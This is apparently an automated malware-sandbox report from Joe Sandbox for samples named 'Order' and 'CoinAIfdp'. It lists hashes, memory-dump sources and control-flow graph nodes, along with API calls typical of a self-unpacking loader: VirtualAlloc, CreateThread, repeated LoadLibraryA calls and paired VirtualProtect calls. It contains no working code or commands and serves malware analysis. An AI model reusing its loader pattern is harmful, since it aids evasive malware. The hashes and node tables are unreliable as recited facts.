                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: CriticalFreeHeapSection$EnterLeave
                      • String ID:
                      • API String ID: 1298188129-0
                      • Opcode ID: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                      • Instruction ID: 19831624efecdb95f34469d84cf285095463f1f7ead1137181efdd2e3cba2855
                      • Opcode Fuzzy Hash: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                      • Instruction Fuzzy Hash: CB012879A0161AAFC7208F96ED04967BB7CFB49751305853AA844A7A60C734E824DFE8
                      APIs
                        • Part of subcall function 0040A11A: memset.MSVCRT ref: 0040A182
                        • Part of subcall function 0040D946: EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                        • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                        • Part of subcall function 0040D946: LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                      • HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                      • HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                      • HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: FreeHeap$CriticalSection$EnterLeavememset
                      • String ID:
                      • API String ID: 4254243056-0
                      • Opcode ID: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                      • Instruction ID: 731859a3b15cae5753bb7de1e8a6b13bc7caaa2a8ebc947d3a100cd7cc498ee7
                      • Opcode Fuzzy Hash: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                      • Instruction Fuzzy Hash: ABF04471215109BFC6115F16DD40D57BF6DFF8A7A43424129B40493571CB36EC20AAA8

                      Execution Graph

                      Execution Coverage:17.7%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:76
                      Total number of Limit Nodes:7
                      execution_graph 23540 54d60e8 23541 54d6130 VirtualAlloc 23540->23541 23542 54d619c 23541->23542 23454 54d6310 23455 54d635d CreateThread 23454->23455 23456 54d63df 23455->23456 23457 5880000 23455->23457 23460 588cbc5 23457->23460 23459 5880005 23461 589004a 23460->23461 23473 588cbcf 23460->23473 23462 5890158 23461->23462 23463 589006e 23461->23463 23474 5891324 23462->23474 23498 58928cb 23463->23498 23466 5890086 23467 58928cb LoadLibraryA 23466->23467 23472 58900fe 23466->23472 23468 58900c8 23467->23468 23469 58928cb LoadLibraryA 23468->23469 23470 58900e4 23469->23470 23471 58928cb LoadLibraryA 23470->23471 23471->23472 23472->23459 23473->23459 23475 58928cb LoadLibraryA 23474->23475 23476 5891347 23475->23476 23477 58928cb LoadLibraryA 23476->23477 23478 589135f 23477->23478 23479 58928cb LoadLibraryA 23478->23479 23480 589137d 23479->23480 23481 5891392 VirtualAlloc 23480->23481 23483 58913a6 23480->23483 23482 58913c0 23481->23482 23481->23483 23482->23483 23484 58928cb LoadLibraryA 23482->23484 23483->23472 23485 589143e 23484->23485 23485->23483 23488 5891494 23485->23488 23502 58926d2 23485->23502 23486 58928cb LoadLibraryA 23486->23488 23488->23483 23488->23486 23489 58914f6 23488->23489 23489->23483 23497 5891558 23489->23497 23506 58904b4 23489->23506 23491 5891664 23533 5891a54 LoadLibraryA 23491->23533 23493 5891619 23493->23483 23529 5891115 23493->23529 23497->23483 23497->23491 23497->23493 23499 58928e2 23498->23499 23500 5892909 23499->23500 23539 58909d0 LoadLibraryA 23499->23539 23500->23466 23504 58926e7 23502->23504 23503 589275d LoadLibraryA 23505 5892767 23503->23505 23504->23503 23504->23505 23505->23485 23507 58926d2 LoadLibraryA 23506->23507 23508 58904c8 23507->23508 23509 58904d0 23508->23509 23534 5892770 23508->23534 23509->23483 23520 58905af 23509->23520 23512 5890506 VirtualProtect 23512->23509 23513 589051a 23512->23513 23514 5890534 VirtualProtect 23513->23514 23515 5892770 LoadLibraryA 23514->23515 23516 5890555 23515->23516 23516->23509 23517 589056c VirtualProtect 23516->23517 23517->23509 23518 589057c 23517->23518 23519 5890591 VirtualProtect 23518->23519 23519->23509 23521 58926d2 LoadLibraryA 23520->23521 23522 58905c5 23521->23522 23523 5892770 LoadLibraryA 23522->23523 23524 58905d5 23523->23524 23525 58905de VirtualProtect 23524->23525 23526 5890612 23524->23526 23525->23526 23527 58905ee 23525->23527 23526->23497 23528 58905fd VirtualProtect 23527->23528 23528->23526 23530 5891148 23529->23530 23531 589128e SafeArrayCreate 23530->23531 23532 58911f3 23530->23532 23531->23532 23532->23483 23533->23483 23535 589278b 23534->23535 23537 58904e8 23534->23537 23535->23537 23538 5890b75 LoadLibraryA 23535->23538 23537->23509 23537->23512 23538->23537 23539->23499

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 26 14f4748-14f4769 28 14f476b 26->28 29 14f4770-14f484f 26->29 28->29 31 14f4f46-14f4f6e 29->31 32 14f4855-14f4996 call 14f0da0 29->32 35 14f5674-14f567d 31->35 78 14f4f0f-14f4f39 32->78 79 14f499c-14f49f7 32->79 36 14f4f7c-14f4f86 35->36 37 14f5683-14f569a 35->37 39 14f4f8d-14f5081 call 14f0da0 36->39 40 14f4f88 36->40 60 14f50ab 39->60 61 14f5083-14f508f 39->61 40->39 65 14f50b1-14f50d1 60->65 63 14f5099-14f509f 61->63 64 14f5091-14f5097 61->64 67 14f50a9 63->67 64->67 70 14f50d3-14f512c 65->70 71 14f5131-14f51b1 65->71 67->65 82 14f5671 70->82 92 14f5208-14f524b call 14f0da0 71->92 93 14f51b3-14f5206 71->93 89 14f4f3b 78->89 90 14f4f43 78->90 86 14f49fc-14f4a07 79->86 87 14f49f9 79->87 82->35 91 14f4e21-14f4e27 86->91 87->86 89->90 90->31 94 14f4e2d-14f4eaa call 14f0170 91->94 95 14f4a0c-14f4a2a 91->95 122 14f5256-14f525f 92->122 93->122 138 14f4ef9-14f4eff 94->138 99 14f4a2c-14f4a30 95->99 100 14f4a81-14f4a96 95->100 99->100 104 14f4a32-14f4a3d 99->104 102 14f4a9d-14f4ab3 100->102 103 14f4a98 100->103 109 14f4aba-14f4ad1 102->109 110 14f4ab5 102->110 103->102 105 14f4a73-14f4a79 104->105 111 14f4a3f-14f4a43 105->111 112 14f4a7b-14f4a7c 105->112 114 14f4ad8-14f4aee 109->114 115 14f4ad3 109->115 110->109 116 14f4a49-14f4a61 111->116 117 14f4a45 111->117 121 14f4aff-14f4b41 112->121 118 14f4af5-14f4afc 114->118 119 14f4af0 114->119 115->114 123 14f4a68-14f4a70 116->123 124 14f4a63 116->124 117->116 118->121 119->118 125 14f4b55-14f4d25 121->125 126 14f4b43-14f4b4f 121->126 128 14f52bf-14f52ce 122->128 123->105 124->123 136 14f4d89-14f4d9e 125->136 137 14f4d27-14f4d2b 125->137 126->125 129 14f5261-14f5289 128->129 130 14f52d0-14f5358 128->130 133 14f528b 129->133 134 14f5290-14f52b9 129->134 166 14f54d1-14f54dd 130->166 133->134 134->128 142 14f4da5-14f4dc6 136->142 143 14f4da0 136->143 137->136 144 14f4d2d-14f4d3c 137->144 140 14f4eac-14f4ef6 138->140 141 14f4f01-14f4f07 138->141 140->138 141->78 145 14f4dcd-14f4dec 142->145 146 14f4dc8 142->146 143->142 148 14f4d7b-14f4d81 144->148 152 14f4dee 145->152 153 14f4df3-14f4e13 145->153 146->145 150 14f4d3e-14f4d42 148->150 151 14f4d83-14f4d84 148->151 157 14f4d4c-14f4d6d 150->157 158 14f4d44-14f4d48 150->158 155 14f4e1e 151->155 152->153 159 14f4e1a 153->159 160 14f4e15 153->160 155->91 162 14f4d6f 157->162 163 14f4d74-14f4d78 157->163 158->157 159->155 160->159 162->163 163->148 167 14f535d-14f5366 166->167 168 14f54e3-14f553e 166->168 169 14f536f-14f54c5 167->169 170 14f5368 167->170 183 14f5575-14f559f 168->183 184 14f5540-14f5573 168->184 187 14f54cb 169->187 170->169 171 14f53ff-14f543f 170->171 172 14f53ba-14f53fa 170->172 173 14f5375-14f53b5 170->173 174 14f5444-14f5484 170->174 171->187 172->187 173->187 174->187 192 14f55a8-14f563b 183->192 184->192 187->166 196 14f5642-14f5662 192->196 196->82
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID: TJq$Teq$pq$xbq
                      • API String ID: 0-2466396065
                      • Opcode ID: cd54354c116e7a808910654495d3f4b302d256674cb1ad0a5caf71d6165a84c4
                      • Instruction ID: 33fa8e034ca074467bef9e9fe91fb9ae8af948149f237da377df81add1143e7d
                      • Opcode Fuzzy Hash: cd54354c116e7a808910654495d3f4b302d256674cb1ad0a5caf71d6165a84c4
                      • Instruction Fuzzy Hash: 2FA2B275A00228CFDB65CF69C984B99BBB2FF89300F1581E9D509AB365DB319E81CF50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 198 14f46f0-14f46fd 199 14f46ff-14f4710 198->199 200 14f4749-14f4769 198->200 204 14f4717-14f4727 199->204 205 14f4712 199->205 201 14f476b 200->201 202 14f4770-14f484f 200->202 201->202 207 14f4f46-14f4f6e 202->207 208 14f4855-14f4996 call 14f0da0 202->208 211 14f472f-14f4733 204->211 205->204 213 14f5674-14f567d 207->213 256 14f4f0f-14f4f39 208->256 257 14f499c-14f49f7 208->257 214 14f4f7c-14f4f86 213->214 215 14f5683-14f569a 213->215 217 14f4f8d-14f5081 call 14f0da0 214->217 218 14f4f88 214->218 238 14f50ab 217->238 239 14f5083-14f508f 217->239 218->217 243 14f50b1-14f50d1 238->243 241 14f5099-14f509f 239->241 242 14f5091-14f5097 239->242 245 14f50a9 241->245 242->245 248 14f50d3-14f512c 243->248 249 14f5131-14f51b1 243->249 245->243 260 14f5671 248->260 270 14f5208-14f524b call 14f0da0 249->270 271 14f51b3-14f5206 249->271 267 14f4f3b 256->267 268 14f4f43 256->268 264 14f49fc-14f4a07 257->264 265 14f49f9 257->265 260->213 269 14f4e21-14f4e27 264->269 265->264 267->268 268->207 272 14f4e2d-14f4eaa call 14f0170 269->272 273 14f4a0c-14f4a2a 269->273 300 14f5256-14f525f 270->300 271->300 316 14f4ef9-14f4eff 272->316 277 14f4a2c-14f4a30 273->277 278 14f4a81-14f4a96 273->278 277->278 282 14f4a32-14f4a3d 277->282 280 14f4a9d-14f4ab3 278->280 281 14f4a98 278->281 287 14f4aba-14f4ad1 280->287 288 14f4ab5 280->288 281->280 283 14f4a73-14f4a79 282->283 289 14f4a3f-14f4a43 283->289 290 14f4a7b-14f4a7c 283->290 292 14f4ad8-14f4aee 287->292 293 14f4ad3 287->293 288->287 294 14f4a49-14f4a61 289->294 295 14f4a45 289->295 299 14f4aff-14f4b41 290->299 296 14f4af5-14f4afc 292->296 297 14f4af0 292->297 293->292 301 14f4a68-14f4a70 294->301 302 14f4a63 294->302 295->294 296->299 297->296 303 14f4b55-14f4d25 299->303 304 14f4b43-14f4b4f 299->304 306 14f52bf-14f52ce 300->306 301->283 302->301 314 14f4d89-14f4d9e 303->314 315 14f4d27-14f4d2b 303->315 304->303 307 14f5261-14f5289 306->307 308 14f52d0-14f5358 306->308 311 14f528b 307->311 312 14f5290-14f52b9 307->312 344 14f54d1-14f54dd 308->344 311->312 312->306 320 14f4da5-14f4dc6 314->320 321 14f4da0 314->321 315->314 322 14f4d2d-14f4d3c 315->322 318 14f4eac-14f4ef6 316->318 319 14f4f01-14f4f07 316->319 318->316 319->256 323 14f4dcd-14f4dec 320->323 324 14f4dc8 320->324 321->320 326 14f4d7b-14f4d81 322->326 330 14f4dee 323->330 331 14f4df3-14f4e13 323->331 324->323 328 14f4d3e-14f4d42 326->328 329 14f4d83-14f4d84 326->329 335 14f4d4c-14f4d6d 328->335 336 14f4d44-14f4d48 328->336 333 14f4e1e 329->333 330->331 337 14f4e1a 331->337 338 14f4e15 331->338 333->269 340 14f4d6f 335->340 341 14f4d74-14f4d78 335->341 336->335 337->333 338->337 340->341 341->326 345 14f535d-14f5366 344->345 346 14f54e3-14f553e 344->346 347 14f536f-14f54c5 345->347 348 14f5368 345->348 361 14f5575-14f559f 346->361 362 14f5540-14f5573 346->362 365 14f54cb 347->365 348->347 349 14f53ff-14f543f 348->349 350 14f53ba-14f53fa 348->350 351 14f5375-14f53b5 348->351 352 14f5444-14f5484 348->352 349->365 350->365 351->365 352->365 370 14f55a8-14f563b 361->370 362->370 365->344 374 14f5642-14f5662 370->374 374->260
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID: TJq$Teq$xbq
                      • API String ID: 0-4091408781
                      • Opcode ID: 361c15c7276c44580e4dbcdccee992e45a12b6b63cf027272b4dafd2797f173b
                      • Instruction ID: cf64edd47a8c71c4782b2c99f014c8b689aace82822a6f168c0185606dbc249e
                      • Opcode Fuzzy Hash: 361c15c7276c44580e4dbcdccee992e45a12b6b63cf027272b4dafd2797f173b
                      • Instruction Fuzzy Hash: 2BC18975E016188FDB58DF6AC944ADDBBF2AF89300F14C1AAD909AB365DB305E81CF50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 376 14f8b70-14f8b9e 377 14f8ba5-14f8cc4 376->377 378 14f8ba0 376->378 381 14f8cc6-14f8ccd call 14fb2c2 377->381 382 14f8cd3-14f8cdf 377->382 378->377 381->382 383 14f8ce6-14f8ceb 382->383 384 14f8ce1 382->384 385 14f8ced-14f8cf9 383->385 386 14f8d23-14f8d6c 383->386 384->383 387 14f8cfb 385->387 388 14f8d00-14f8d1e 385->388 395 14f8d6e 386->395 396 14f8d73-14f8f8c 386->396 387->388 390 14fa1d0-14fa1d6 388->390 391 14fa1d8-14fa1f8 390->391 392 14fa201 390->392 391->392 394 14fa202 392->394 394->394 395->396 418 14f99bc-14f99c8 396->418 419 14f99ce-14f9a06 418->419 420 14f8f91-14f8f9d 418->420 429 14f9ab5-14f9abb 419->429 421 14f8f9f 420->421 422 14f8fa4-14f90c9 420->422 421->422 456 14f90cb-14f9103 422->456 457 14f9109-14f9192 422->457 430 14f9a0b-14f9a36 429->430 431 14f9ac1-14f9af9 429->431 440 14f9a42-14f9a5d 430->440 441 14f9cf8-14f9cfe 431->441 442 14f9a5f-14f9a63 440->442 443 14f9a90-14f9ab2 440->443 446 14f9afe-14f9c29 441->446 447 14f9d04-14f9d4c 441->447 442->443 445 14f9a65-14f9a8d 442->445 443->429 445->443 495 14f9c2b-14f9c94 446->495 496 14f9c96-14f9c9a 446->496 453 14f9d4e-14f9dc1 447->453 454 14f9dc7-14f9e12 447->454 453->454 474 14fa19a-14fa1a0 454->474 456->457 483 14f9194-14f919c 457->483 484 14f91a1-14f9225 457->484 478 14f9e17-14f9e99 474->478 479 14fa1a6-14fa1ce 474->479 500 14f9e9b-14f9eb6 478->500 501 14f9ec1-14f9ecd 478->501 479->390 487 14f99ad-14f99b9 483->487 517 14f9227-14f922f 484->517 518 14f9234-14f92b8 484->518 487->418 511 14f9cdf-14f9cf5 495->511 498 14f9ccc-14f9cde 496->498 499 14f9c9c-14f9cca 496->499 498->511 499->511 500->501 502 14f9ecf 501->502 503 14f9ed4-14f9ee0 501->503 502->503 507 14f9ef3-14f9f02 503->507 508 14f9ee2-14f9eee 503->508 514 14f9f0b-14fa162 507->514 515 14f9f04 507->515 512 14fa181-14fa197 508->512 511->441 512->474 545 14fa16d-14fa179 514->545 515->514 519 14fa03f-14fa0a8 515->519 520 14fa0ad-14fa0ea 515->520 521 14f9f54-14f9fcc 515->521 522 14f9f11-14f9f4f 515->522 523 14f9fd1-14fa03a 515->523 517->487 557 14f92ba-14f92c2 518->557 558 14f92c7-14f934b 518->558 519->545 544 14fa133-14fa139 520->544 521->545 522->545 523->545 550 14fa0ec-14fa11f 544->550 551 14fa13b-14fa145 544->551 545->512 554 14fa126-14fa130 550->554 555 14fa121 550->555 551->545 554->544 555->554 557->487 564 14f934d-14f9355 558->564 565 14f935a-14f93de 558->565 564->487 571 14f93ed-14f9471 565->571 572 14f93e0-14f93e8 565->572 578 14f9473-14f947b 571->578 579 14f9480-14f9504 571->579 572->487 578->487 585 14f9506-14f950e 579->585 586 14f9513-14f9597 579->586 585->487 592 14f9599-14f95a1 586->592 593 14f95a6-14f962a 586->593 592->487 599 14f962c-14f9634 593->599 600 14f9639-14f96bd 593->600 599->487 606 14f96bf-14f96c7 600->606 607 14f96cc-14f9750 600->607 606->487 613 14f975f-14f97e3 607->613 614 14f9752-14f975a 607->614 620 14f97e5-14f97ed 613->620 621 14f97f2-14f9876 613->621 614->487 620->487 627 14f9878-14f9880 621->627 628 14f9885-14f9909 621->628 627->487 634 14f990b-14f9913 628->634 635 14f9918-14f999c 628->635 634->487 641 14f999e-14f99a6 635->641 642 14f99a8-14f99aa 635->642 641->487 642->487
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2$$q
                      • API String ID: 0-2017333547
                      • Opcode ID: 918b544a95eed28595524f56ff58d1b88505cfa641361ed2da27594f0bb12abd
                      • Instruction ID: 6da0fcd01d88f19f9a9ce29913180097900a18a0e0a4db96d9ff7789b387025c
                      • Opcode Fuzzy Hash: 918b544a95eed28595524f56ff58d1b88505cfa641361ed2da27594f0bb12abd
                      • Instruction Fuzzy Hash: EAD2F9B4A002188FDB64DF69D994B9DBBB5FB88304F1581EAD50DA7368DB309E81CF41
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7e68a70f86e76bee2cc7adae73cd39251d8147637e8ecba36b5d3b7c1129bba4
                      • Instruction ID: 609728e1729155691cf4a6c188b6fc5f6d415ecb8b1318490b3a2c83106dc1b4
                      • Opcode Fuzzy Hash: 7e68a70f86e76bee2cc7adae73cd39251d8147637e8ecba36b5d3b7c1129bba4
                      • Instruction Fuzzy Hash: 2042B5B4A04229CFCB64DF28C984B99BBB6FB48300F5581DAD64DA7355DB30AE81CF54
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 118abd2ed98e32c7afb1b56bb68c9507aabb2ba2bc556157a0225f0be6803ee9
                      • Instruction ID: 789a7916698356073caf3c6b6dbb55fe4b64a0851830741de91adeddb4f18dac
                      • Opcode Fuzzy Hash: 118abd2ed98e32c7afb1b56bb68c9507aabb2ba2bc556157a0225f0be6803ee9
                      • Instruction Fuzzy Hash: D0C1F0B1D05268CFEB64CFA9C944BDDBBF1AB58310F0190AA850DAB364D7749AC9CF40
                      Memory Dump Source
                      • Source File: 00000006.00000002.1488093639.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_14f0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 17aafc5ec780e013f619e3298f888429b03b06d317463d36d4ebf9a4c3613c94
                      • Instruction ID: 5a97576d77daf0f811fad759cba96a4673c2e8f120949a3a1644eac39d06e6e5
                      • Opcode Fuzzy Hash: 17aafc5ec780e013f619e3298f888429b03b06d317463d36d4ebf9a4c3613c94
                      • Instruction Fuzzy Hash: EE51BFB1E006198BEB18CF6BD94469EFAF3BFC8304F14C1BAD508AB269DB7049418F54
                      Memory Dump Source
                      • Source File: 00000006.00000002.1491732857.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_58a0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dd9a9ad28f5636fb728d1a62dab99a577b142eb86c686e2057831a35abb078ed
                      • Instruction ID: 3d55231b336664156e0ef1a734b5beb9d0424f01c226d8f83be8aee024b4b2aa
                      • Opcode Fuzzy Hash: dd9a9ad28f5636fb728d1a62dab99a577b142eb86c686e2057831a35abb078ed
                      • Instruction Fuzzy Hash: 7D219871D05618DBEB18CFAAC95469EBBF7BF88300F54C07A8819AB265EB705946CF40

                      Control-flow Graph

                      APIs
                        • Part of subcall function 058926D2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 05892764
                      • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 0589050F
                      • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 05890542
                      • VirtualProtect.KERNEL32(00000000,0040145E,00000040,?), ref: 05890575
                      • VirtualProtect.KERNEL32(00000000,0040145E,?,?), ref: 0589059F
                      Memory Dump Source
                      • Source File: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5880000_CoinAIfdp.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual$LibraryLoad
                      • String ID:
                      • API String ID: 895956442-0
                      • Opcode ID: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
                      • Instruction ID: 3c88fafea19a84f00e875ee25d30f08ae2fb7a85101fc5f30f116ec2c827070e
                      • Opcode Fuzzy Hash: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
                      • Instruction Fuzzy Hash: 4621B57620830DFEEB18AA648C48F7B769CDB85305F08043EFE47E5461EB65AD4587B1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 644 58926d2-58926e5 645 58926fd-5892707 644->645 646 58926e7-58926ea 644->646 648 5892709-5892711 645->648 649 5892716-5892722 645->649 647 58926ec-58926ef 646->647 647->645 651 58926f1-58926fb 647->651 648->649 650 5892725-589272a 649->650 652 589275d-5892764 LoadLibraryA 650->652 653 589272c-5892737 650->653 651->645 651->647 656 5892767-589276b 652->656 654 5892739-5892751 call 5892da0 653->654 655 5892753-5892757 653->655 654->655 660 589276c-589276e 654->660 655->650 658 5892759-589275b 655->658 658->652 658->656 660->656
                      APIs
                      • LoadLibraryA.KERNEL32(00000000,?,?), ref: 05892764
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5880000_CoinAIfdp.jbxd
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: .dll
                      • API String ID: 1029625771-2738580789
                      • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                      • Instruction ID: d12c1157129a6225f17b4adb77f45dba7bac1ca3701cdd3e2f6ff00505826fec
                      • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                      • Instruction Fuzzy Hash: 1F21D23D604295BFDF2ADF6CC844A6ABBA4BF05260F0C406DEC17DBA41D720EC458780

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 661 58905af-58905dc call 58926d2 call 5892770 666 58905de-58905ec VirtualProtect 661->666 667 5890612 661->667 666->667 668 58905ee-5890610 call 5892d40 VirtualProtect 666->668 669 5890614-5890617 667->669 668->669
                      APIs
                        • Part of subcall function 058926D2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 05892764
                      • VirtualProtect.KERNEL32(00000000,00000004,00000040,?), ref: 058905E7
                      • VirtualProtect.KERNEL32(00000000,00000004,?,?), ref: 0589060A
                      Memory Dump Source
                      • Source File: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5880000_CoinAIfdp.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual$LibraryLoad
                      • String ID:
                      • API String ID: 895956442-0
                      • Opcode ID: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
                      • Instruction ID: f1893132a9bf88591fe1091a9bbbb0c5a1ebec76bcaf1aa9453d483f6c4aac78
                      • Opcode Fuzzy Hash: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
                      • Instruction Fuzzy Hash: A1F081BA200708BEEA55A6A5CC45FFB32ACDF85655F440418FF06D6080E761AE4187A5

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 766 58a71d0-58a71d7 767 58a71dd-58a71de 766->767 768 58ae417-58ae452 766->768 767->768 773 58ae45a-58ae461 768->773
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.1491732857.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_58a0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0$Y
                      • API String ID: 0-947205236
                      • Opcode ID: dd9fb818bc36ef46fbc533135f1b29beb141439f881dd540d49cbe20dd4d32ea
                      • Instruction ID: d3fd1c9792f7eb2207b3fb62ea06982dd03a0430b1fe2f40dff82376590fdc7e
                      • Opcode Fuzzy Hash: dd9fb818bc36ef46fbc533135f1b29beb141439f881dd540d49cbe20dd4d32ea
                      • Instruction Fuzzy Hash: 5EF01C34951218CFDB28DF20D8A87AD7B76BF85354F4104A8D40A672A0DF341D85DF04

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 774 58a0506-58a053f 777 58a00fc-58a0107 774->777 778 58a0545-58a0550 774->778 779 58a0109-58a65d8 777->779 780 58a0110-58a0389 777->780 778->777 784 58a65de-58a6606 779->784 785 58ae417-58ae452 779->785 780->777 792 58a038f-58a039a 780->792 784->777 789 58a660c-58a6617 784->789 795 58ae45a-58ae461 785->795 789->777 792->777
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.1491732857.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_58a0000_CoinAIfdp.jbxd
                      Similarity
                      • API ID:
                      • String ID: X$h
                      • API String ID: 0-795848406
                      • Opcode ID: 52825ec18e9284c6aae9440842c0c04395cdf7baee5a0e07b8fcee28d413fab1
                      • Instruction ID: ef97f6a05e40a0fcce67f25051c873d054ae08b80e76c7424503b93e70a982a2
                      • Opcode Fuzzy Hash: 52825ec18e9284c6aae9440842c0c04395cdf7baee5a0e07b8fcee28d413fab1
                      • Instruction Fuzzy Hash: 5BF0C974850229CFEB34DF14C958B9ABB72FB04305F0044E9D909A3290E7754E88DF01

                      Control-flow Graph

                      • Executed
                      • Not Executed
